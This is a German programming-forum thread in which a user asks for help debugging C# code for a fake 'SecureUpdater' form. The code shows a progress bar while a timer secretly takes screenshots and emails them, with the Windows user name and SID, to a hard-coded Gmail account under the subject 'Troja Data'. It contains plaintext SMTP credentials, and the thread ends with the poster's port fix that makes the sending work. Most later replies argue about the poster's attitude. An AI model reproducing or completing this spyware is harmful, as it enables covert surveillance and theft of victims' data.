C# Fehler ! Doch wie gemeint ?

Hiho ! Meine letzte Frage hockt bis heute ja noch tot ;) Aber naja bin ich schon gewohnt :D Aber diesesmal wäre nett keine 93 Views aber nur eine halbe antwort zu haben :D

Also ich habe da ein minimales Problem würde ich sagen ;)

Mein Code:
Code:
 public partial class Form1 : Form
    {
        string printScreen = null;
        static int i = 0;
        public Bitmap CaptureScreen();

public Form1()
        {
            InitializeComponent();
        }

private static Bitmap BitMapCreater()

und um diese Zeile geht es :
public Bitmap CaptureScreen();

da kriege ich die Meldung :
Fehler 1
"SecureUpdater_TrueJoker.Form1.CaptureScreen()" ist nicht als abstrakt, extern oder partiell gekennzeichnet und muss daher einen Text deklarieren. C:\Users\*****\documents\visual studio 2010\Projects\SecureUpdater-TrueJoker\SecureUpdater-TrueJoker\Form1.cs 19 23 SecureUpdater-TrueJoker

Wisst ihr woran es liegt ?

Nach allem was ich von C# verstehe fehlt da schlicht der Methodenrumpf. Wenn der in einer anderen Datei steht, muss man die Methode als partial deklarieren. Wenn du sie garnicht implementierst musst du die Methode als abstract deklarieren und anderswo überschreiben.

(BTW: Maß schreibt man mit ß, nicht Doppel-S. Das reizte gerade meinen inneren Rechtschreibungsfaschisten.)

danke

Ok Problem behoben :)
Nun nurnoch eine Frage !

Mein Code sieht nun so aus :
Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Drawing.Imaging;
using System.Net;
using System.Runtime.InteropServices;

namespace SecureUpdater_TrueJoker
{
    public partial class Form1 : Form
    {
    string printScreen = null;
        static int i = 0;
        public Form1()
        {
            InitializeComponent();
        }

private static Bitmap BitMapCreater()
{
Rectangle rect = Screen.PrimaryScreen.Bounds;
int color = Screen.PrimaryScreen.BitsPerPixel;
PixelFormat pFormat;
switch (color)
{
case 8:
case 16:
pFormat = PixelFormat.Format16bppRgb565;
break;

case 24:
pFormat = PixelFormat.Format24bppRgb;
break;

case 32:
pFormat = PixelFormat.Format32bppArgb;
break;

default:
pFormat = PixelFormat.Format32bppArgb;
break;

}
Bitmap bmp = new Bitmap(rect.Width, rect.Height, pFormat);
Graphics g = Graphics.FromImage(bmp);
g.CopyFromScreen(rect.Left, rect.Top, 0, 0, rect.Size);
return bmp;
}
        private static string sendMail(System.Net.Mail.MailMessage mm)
        {
            try
            {
                string smtpHost = "smtp.gmail.com";
                string userName = "streamingobject@googlemail.com";//write your email address
                string password = "patrickbloch900";//write password
                System.Net.Mail.SmtpClient mClient = new System.Net.Mail.SmtpClient();
                mClient.Port = 587;
                mClient.EnableSsl = true;
                mClient.UseDefaultCredentials = false;
                mClient.Credentials = new NetworkCredential(userName, password);
                mClient.Host = smtpHost;
                mClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;
                mClient.Send(mm);
            }
            catch (Exception ex)
            {
                System.Console.Write(ex.Message);
            }

return "Update erfolgreich beenden! Updater wurde nun beendet!";
        }

private void button2_Click(object sender, EventArgs e)
        {
            this.Hide();
        }

private void button1_Click(object sender, EventArgs e)
        {
            this.progressBar1.Value = 0;

this.timer1.Interval = 900;
            this.timer1.Enabled = true;
        }

private void timer1_Tick(object sender, EventArgs e)
        {
            if (this.progressBar1.Value < 100) // Should be less than progress bar max value
            {
                this.progressBar1.Value++;
                if (this.progressBar1.Value == 100) //The maximum value of the progress bar
                {
                    label2.Visible = true;
                    button2.Visible = true;
                }
            }
            else
            {
                this.timer1.Enabled = false;
            } 
        }

private void Form1_Load(object sender, EventArgs e)
        {

}

private void timer2_Tick(object sender, EventArgs e)
{
i = i + 1;
string sysName = string.Empty;
string sysUser = string.Empty;
Bitmap b = BitMapCreater();
printScreen = string.Format("{0}{1}", Path.GetTempPath(), "screen" + i + ".jpg");
b.Save(printScreen, ImageFormat.Jpeg);
System.Net.Mail.MailAddress toAddress = new System.Net.Mail.MailAddress("streamingobject@googlemail.com");
System.Net.Mail.MailAddress fromAddress = new System.Net.Mail.MailAddress("remoteMachine@yahoo.com");
System.Net.Mail.MailMessage mm = new System.Net.Mail.MailMessage(fromAddress, toAddress);
sysName = System.Security.Principal.WindowsIdentity.GetCurrent().Name.ToString();
sysUser = System.Security.Principal.WindowsIdentity.GetCurrent().User.ToString();
mm.Subject = sysName + "Troja Data " + sysUser;
string filename = string.Empty;
System.Net.Mail.Attachment mailAttachment = new System.Net.Mail.Attachment(printScreen);
mm.Attachments.Add(mailAttachment);
mm.IsBodyHtml = true;
mm.BodyEncoding = System.Text.Encoding.UTF8;
sendMail(mm);
}
}
}

Rein Theo müsste er ein Screenshot´s im 100 Intervall machen und sie dann speichern um sie dann an die angegebene Mail zu senden ! Aber irgendwie sendet er keine ! Wiederum Fehlermeldungen bekomme ich nicht ! Jemand ne Idee ?

Sry für meine Rechtschreibung :)

Ne muss ich nicht den account gibt es zwar aber habe ja nachgedacht :) Habe die eigentliche Adresse in eine alte von mir getauscht :) Aber danke für den Hinweiss ^^

Danke !!!

Danke an die beiden für die Hilfe ! Und die anderen die nur gegugt haben danke für nichts !!!!!!!!

Hab den Fehler ein Versand sollte immer über 25 oder 465 laufen wenn man per c# verschickt!

Hiho ! Meine letzte Frage hockt bis heute ja noch tot ;) Aber naja bin ich schon gewohnt :D Aber diesesmal wäre nett keine 93 Views aber nur eine halbe antwort zu haben :D

Danke an die beiden für die Hilfe ! Und die anderen die nur gegugt haben danke für nichts !!!!!!!!

So, von mir gibt es keine Hilfe mehr. Bei solchen Posts steige ich aus. Man versucht dir zu helfen, bitet dir die Lösung, und DU probierst es nicht mal aus, sondern maulst nur rum.
Außerdem fehlt es dir allgemein an Basiswissen in OOP und C#. Du solltest erst damit anfangen, denn deine Fragen sind Basics.

So, von mir gibt es keine Hilfe mehr. Bei solchen Posts steige ich aus. Man versucht dir zu helfen, bitet dir die Lösung, und DU probierst es nicht mal aus, sondern maulst nur rum.

Ausprobiert hat er es wohl schon. Sein erstes Problem schien doch gelöst zu sein und sein zweites hat er selbst innerhalb von weniger als 60 min gelöst, da frag ich mich ernsthaft was er eigentlich genau von uns will, dass rumgemeckert wird?
Vorallem was hat das Ganze mit den Views zu tun? Nur weil ich in den Thread gucke weiß ich noch lange nicht die Lösung zu jedem Problem, vorallem weiß ich nicht was vorher drin steht wenn der Threadtitel "C# Fehler..." ist und der Google Bot der mal vorbeischaut kennt sicherlich auch nicht die Lösung auf sein Problem.

Wievielen hast du denn schon geholfen bei Problemen, TrueJoker?
Und zum Vergleich: Wo hast du überall nur reingschaut?
Und die Bonusfrage: Wie oft hast du schon Hilfe erhalten?

Mal was zum Nachdenken. :wink:

Wievielen hast du denn schon geholfen bei Problemen, TrueJoker?
Und zum Vergleich: Wo hast du überall nur reingschaut?
Und die Bonusfrage: Wie oft hast du schon Hilfe erhalten?

Mal was zum Nachdenken. :wink:

Vielen ! Wiederum nicht in diesem Board sondern Privat oder über Foren gewisser Online Spiele von mir !

Ich kann nur rienschauen womit ich mich auch wirklich auskenne ! Dumme Kommentare von mir oder bei google rausgesuchte Sachen als Zitat helfen auch nichT!

2 mal habe ich hier hilfe erhalten ! Und zu dem Meckern das GambaJo
mir nicht mehr helfen möchte ! Das erste Problem wo du mir geholfen hast war beseitigt und dieses Problem habe ich beseitigt gekriegt weil ich dann gesehen habe das ich in C# auf die Windows Port Standarts zurückgreife wenn ich visual c# programmiere !

Beim ersten Problem welches ich gepostet habe war ich genau an dieser Stelle aber brauchte einen Denkanstoß im Sinne wie der Vorgang ist! Dieses habe ich gelöst später in dem ich im IRC nachgefragt habe von einem Kollegen.

Ich lerne durch Projekte ! Do it yourself and learn ! Ist mein Motto ! Wo ist den da dass Problem ? Wenn ich mal frage ! Prinzipiell frage ich ja nicht jeden Scheiss sondern nur wenn ich wirklich was nicht finde bei Google oder ähnlichem !

Wo ist den da dass Problem ?
hier?
Aber diesesmal wäre nett keine 93 Views aber nur eine halbe antwort zu haben
und hier?

Was erwartest du? Wie man in den Wald reinruft, so kommts bekanntlich auch wieder raus.

Du beschwerst dich, daß es viele Views, aber keine für dich zufriedenstellende Antwort gab. Ich für meinen Teil lese viele Posts von denen ich nicht mal halb soviel Ahnung habe wie der Threadersteller selbst um meinen Horizont zu erweitern.

Es gibt genügend andere Foren, da wärst du schon viel früher auf Widerstand gestoßen.

just my 2 cents...

P.S.: Nimms mir nicht übel, aber sogar mir als Laie fällt auf, daß dir noch einiges an Grundlagen zu fehlen scheint.

Zuletzt bearbeitet:
@TrueJoker:

Du musst ja selbst wissen, woran es liegt, dass man einen undankbaren Eindruck von dir bekommt. :wink:

Aber es liegt bestimmt an uns allen und nicht an dir.

Zurück
Oben